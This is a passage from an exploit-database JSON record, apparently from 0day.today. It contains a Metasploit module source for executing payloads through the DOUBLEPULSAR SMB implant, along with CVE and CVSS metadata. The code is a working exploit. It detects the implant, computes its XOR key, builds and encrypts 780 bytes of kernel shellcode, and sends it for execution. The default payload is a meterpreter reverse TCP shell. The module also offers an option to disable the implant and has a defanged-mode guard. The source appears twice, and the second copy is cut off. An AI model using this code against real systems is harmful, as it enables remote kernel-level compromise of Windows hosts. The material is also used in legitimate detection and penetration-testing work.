0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-06] #"}, "lastseen": "2021-10-05T22:17:33", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "eefb8288df9b0d8c7d7ee0c8a8b15530", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-06T22:19:02", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-05T22:17:33", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-05T22:17:33", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 